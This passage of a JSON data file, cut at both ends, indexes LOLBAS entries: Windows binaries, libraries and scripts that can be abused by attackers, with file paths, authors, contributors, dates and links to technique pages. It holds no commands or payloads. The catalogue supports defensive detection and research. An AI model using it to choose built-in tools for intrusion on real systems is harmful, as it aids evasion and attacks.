@404death"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wscript/"],"count":2},{"id":"lolbas:wsreset-exe","name":"Wsreset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsreset.exe"],"author":"Oddvar Moe","created":"2019-03-18T00:00:00.000Z","contributors":["Hashim Jawad @ihack4falafel"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"],"count":1},{"id":"lolbas:wuauclt-exe","name":"wuauclt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wuauclt.exe","C:\\Windows\\UUS\\amd64\\wuauclt.exe"],"author":"David Middlehurst","created":"2020-09-23T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wuauclt/"],"count":1},{"id":"lolbas:xwizard-exe","name":"Xwizard.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn","Nick Tyrer @NickTyrer","harr0ey @harr0ey","Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"],"count":3},{"id":"lolbas:msedge-proxy-exe","name":"msedge_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"author":"Mert Daş","created":"2023-08-18T00:00:00.000Z","contributors":["Mert Daş @merterpreter"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"],"count":2},{"id":"lolbas:msedgewebview2-exe","name":"msedgewebview2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"author":"Matan Bahar","created":"2023-06-15T00:00:00.000Z","contributors":["Uriel Kosayev @MalFuzzer","Hai Vaknin @VakninHai","Tamir Yehuda @Tamirye94","Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"count":4},{"id":"lolbas:odbcad32-exe","name":"odbcad32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\odbcad32.exe","c:\\windows\\syswow64\\odbcad32.exe"],"author":"Ekitji","created":"2025-09-04T00:00:00.000Z","contributors":["amonitoring","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/odbcad32/"],"count":1},{"id":"lolbas:setupugc-exe","name":"setupugc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"author":"Ang Kar Min","created":"2026-04-20T00:00:00.000Z","contributors":["Ang Kar Min @karminang"],"references":["https://lolbas-project.github.io/lolbas/Binaries/setupugc/"],"count":2},{"id":"lolbas:write-exe","name":"write.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\write.exe","C:\\Windows\\System32\\write.exe","C:\\Windows\\SysWOW64\\write.exe"],"author":"Michal Belzak","created":"2025-06-17T00:00:00.000Z","contributors":["Michal Belzak"],"references":["https://lolbas-project.github.io/lolbas/Binaries/write/"],"count":1},{"id":"lolbas:wt-exe","name":"wt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"],"author":"Nasreddine Bencherchali","created":"2022-07-27T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wt/"],"count":1},{"id":"lolbas:advpack-dll","name":"Advpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Moriarty (RegisterOCX - CMD) @moriarty_meng","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"count":5},{"id":"lolbas:desk-cpl","name":"Desk.cpl","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"author":"Hai Vaknin","created":"2022-04-21T00:00:00.000Z","contributors":["Rafael S Marques @pegabizu","Pierre-Alexandre Braeken @pabraeken","hai @VakninHai","Christopher Peacock @SecurePeacock","Jose Luis Sanchez @Joseliyo_Jstnk"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Desk/"],"count":2},{"id":"lolbas:dfshim-dll","name":"Dfshim.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"],"count":1},{"id":"lolbas:ieadvpack-dll","name":"Ieadvpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Pierre-Alexandre Braeken (RegisterOCX - CMD) @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/"],"count":5},{"id":"lolbas:ieframe-dll","name":"Ieframe.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieframe.dll","c:\\windows\\syswow64\\ieframe.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Adam @hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Ieframe/"],"count":1},{"id":"lolbas:mshtml-dll","name":"Mshtml.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\mshtml.dll","c:\\windows\\syswow64\\mshtml.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Mshtml/"],"count":1},{"id":"lolbas:pcwutl-dll","name":"Pcwutl.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\pcwutl.dll","c:\\windows\\syswow64\\pcwutl.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/"],"count":1},{"id":"lolbas:photoviewer-dll","name":"PhotoViewer.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll","C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll"],"author":"Avihay Eldad","created":"2025-06-22T00:00:00.000Z","contributors":["Avihay Eldad @avihayeldad","Tommy Warren"],"references":["https://lolbas-project.github.io/lolbas/Libraries/PhotoViewer/"],"count":1},{"id":"lolbas:scrobj-dll","name":"Scrobj.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\scrobj.dll","c:\\windows\\syswow64\\scrobj.dll"],"author":"Eral4m","created":"2021-01-07T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Scrobj/"],"count":1},{"id":"lolbas:setupapi-dll","name":"Setupapi.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\setupapi.dll","c:\\windows\\syswow64\\setupapi.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan (COM Scriptlet) @KyleHanslovan","Huntress Labs (COM Scriptlet) @HuntressLabs","Casey Smith (COM Scriptlet) @subTee","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Setupapi/"],"count":2},{"id":"lolbas:shdocvw-dll","name":"Shdocvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shdocvw.dll","c:\\windows\\syswow64\\shdocvw.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @hexacorn","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shdocvw/"],"count":1},{"id":"lolbas:shell32-dll","name":"Shell32.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shell32.dll","c:\\windows\\syswow64\\shell32.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (Control_RunDLL, Control_RunDLLNoFallback) @hexacorn","Pierre-Alexandre Braeken (ShellExec_RunDLL) @pabraeken","Matt Graeber (ShellExec_RunDLL) @mattifestation","Kyle Hanslovan (ShellExec_RunDLL) @KyleHanslovan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shell32/"],"count":4},{"id":"lolbas:shimgvw-dll","name":"Shimgvw.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\shimgvw.dll","c:\\windows\\syswow64\\shimgvw.dll"],"author":"Eral4m","created":"2021-01-06T00:00:00.000Z","contributors":["Eral4m @eral4m"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Shimgvw/"],"count":1},{"id":"lolbas:syssetup-dll","name":"Syssetup.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\syssetup.dll","c:\\windows\\syswow64\\syssetup.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken (Execute) @pabraeken","Matt harr0ey (Execute) @harr0ey","Jimmy (Scriptlet) @bohops"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Syssetup/"],"count":2},{"id":"lolbas:url-dll","name":"Url.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\url.dll","c:\\windows\\syswow64\\url.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Adam (OpenURL) @hexacorn","Jimmy (OpenURL) @bohops","Malwrologist (FileProtocolHandler - HTA) @DissectMalware","r0lan (Obfuscation) @r0lan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Url/"],"count":6},{"id":"lolbas:zipfldr-dll","name":"Zipfldr.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\zipfldr.dll","c:\\windows\\syswow64\\zipfldr.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Moriarty (Execution) @moriarty_meng","r0lan (Obfuscation) @r0lan"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/"],"count":2},{"id":"lolbas:comsvcs-dll","name":"Comsvcs.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\comsvcs.dll"],"author":"LOLBAS Team","created":"2019-08-30T00:00:00.000Z","contributors":["modexp"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/"],"count":1},{"id":"lolbas:cl-loadassembly-ps1","name":"CL_LoadAssembly.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/"],"count":1},{"id":"lolbas:cl-mutexverifiers-ps1","name":"CL_Mutexverifiers.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1","C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Mutexverifiers/"],"count":1},{"id":"lolbas:cl-invocation-ps1","name":"CL_Invocation.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1","C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Scripts/CL_Invocation/"],"count":1},{"id":"lolbas:launch-vsdevshell-ps1","name":"Launch-VsDevShell.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\Tools\\Launch-VsDevShell.ps1"],"author":"Nasreddine Bencherchali","created":"2022-06-13T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Launch-VsDevShell/"],"count":2},{"id":"lolbas:manage-bde-wsf","name":"Manage-bde.wsf","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\manage-bde.wsf"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy @bohops","Daniel Bohannon @danielbohannon","John Lambert @JohnLaTwC"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Manage-bde.wsf/"],"count":2},{"id":"lolbas:pubprn-vbs","name":"Pubprn.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs","C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Pubprn/"],"count":1},{"id":"lolbas:syncappvpublishingserver-vbs","name":"Syncappvpublishingserver.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas","Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"],"count":1},{"id":"lolbas:utilityfunctions-ps1","name":"UtilityFunctions.ps1","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\diagnostics\\system\\Networking\\UtilityFunctions.ps1"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick VanGilder @nickvangilder"],"references":["https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/"],"count":1},{"id":"lolbas:winrm-vbs","name":"winrm.vbs","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["C:\\Windows\\System32\\winrm.vbs","C:\\Windows\\SysWOW64\\winrm.vbs"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Matt Nelson @enigma0x3","Casey Smith @subtee","Jimmy @bohops","Red Canary Company cc Tony Lambert @redcanaryco"],"references":["https://lolbas-project.github.io/lolbas/Scripts/winrm/"],"count":3},{"id":"lolbas:pester-bat","name":"Pester.bat","source":"LOLBAS","platform":["Windows"],"toolType":"Script","aliases":[],"fullPath":["c:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\<VERSION>\\bin\\Pester.bat"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Emin Atac @p0w3rsh3ll","Stamatis Chatzimangou @_st0pp3r_"],"references":["https://lolbas-project.github.io/lolbas/Scripts/Pester/"],"count":2},{"id":"lolbas:acccheckconsole-exe","name":"AccCheckConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x86\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\x64\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm\\AccChecker\\AccCheckConsole.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22000.0\\arm64\\AccChecker\\AccCheckConsole.exe"],"author":"bohops","created":"2022-01-02T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/"],"count":2},{"id":"lolbas:adplus-exe","name":"adplus.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\adplus.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\adplus.exe"],"author":"mr.d0x","created":"2021-09-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/adplus/"],"count":4},{"id":"lolbas:agentexecutor-exe","name":"AgentExecutor.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe"],"author":"Eleftherios Panos","created":"2020-07-23T00:00:00.000Z","contributors":["Eleftherios Panos @lefterispan"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AgentExecutor/"],"count":2},{"id":"lolbas:applauncher-exe","name":"AppLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Microsoft User Experience Virtualization\\Management\\AppLauncher.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppLauncher/"],"count":1},{"id":"lolbas:appcert-exe","name":"AppCert.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\App Certification Kit\\appcert.exe","C:\\Program Files\\Windows Kits\\10\\App Certification Kit\\appcert.exe"],"author":"Avihay Eldad","created":"2024-03-06T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/AppCert/"],"count":2},{"id":"lolbas:appvlp-exe","name":"Appvlp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\client\\appvlp.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\client\\appvlp.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fab @0rbz_","Will @moo_hax","Matt Wilson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/"],"count":2},{"id":"lolbas:bcp-exe","name":"Bcp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\170\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\130\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\Client SDK\\ODBC\\110\\Tools\\Binn\\bcp.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\bcp.exe"],"author":"Mahir Ali Khan","created":"2025-11-13T00:00:00.000Z","contributors":["Mahir Ali Khan @mahiralikhan07"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bcp/"],"count":1},{"id":"lolbas:bginfo-exe","name":"Bginfo.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/"],"count":6},{"id":"lolbas:cdb-exe","name":"Cdb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\cdb.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","mr.d0x @mrd0x","Spooky Sec @sec_spooky","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"],"count":3},{"id":"lolbas:coregen-exe","name":"coregen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"author":"Martin Sohn Christensen","created":"2020-10-09T00:00:00.000Z","contributors":["Nicky Tyrer","Evan Pena","Casey Erikson"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"],"count":3},{"id":"lolbas:createdump-exe","name":"Createdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"],"author":"mr.d0x, Daniel Santos","created":"2022-01-20T00:00:00.000Z","contributors":["bopin @bopin2020"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"],"count":1},{"id":"lolbas:csi-exe","name":"csi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe","c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/csi/"],"count":1},{"id":"lolbas:defaultpack-exe","name":"DefaultPack.EXE","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\DefaultPack\\DefaultPack.exe"],"author":"@checkymander","created":"2020-10-01T00:00:00.000Z","contributors":["checkymander @checkymander"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"],"count":1},{"id":"lolbas:devinit-exe","name":"Devinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"],"count":1},{"id":"lolbas:devtoolslauncher-exe","name":"Devtoolslauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"author":"felamos","created":"2019-10-04T00:00:00.000Z","contributors":["felamos @_felamos"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"],"count":2},{"id":"lolbas:dnx-exe","name":"dnx.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dnx/"],"count":1},{"id":"lolbas:dotnet-exe","name":"Dotnet.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"author":"felamos","created":"2019-11-12T00:00:00.000Z","contributors":["felamos @_felamos","Jimmy @bohops","yamalon @mavinject"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"count":4},{"id":"lolbas:dsdbutil-exe","name":"dsdbutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["dsDbUtil.exe"],"fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"author":"Ekitji","created":"2023-05-31T00:00:00.000Z","contributors":["bohop @bohops","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"count":5},{"id":"lolbas:dtutil-exe","name":"dtutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe"],"author":"Avihay Eldad","created":"2024-06-17T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dtutil/"],"count":1},{"id":"lolbas:dump64-exe","name":"Dump64.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"],"author":"mr.d0x","created":"2021-11-16T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"],"count":1},{"id":"lolbas:dumpminitool-exe","name":"DumpMinitool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\\DumpMinitool.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"],"count":1},{"id":"lolbas:dxcap-exe","name":"Dxcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey","Vikas Singh 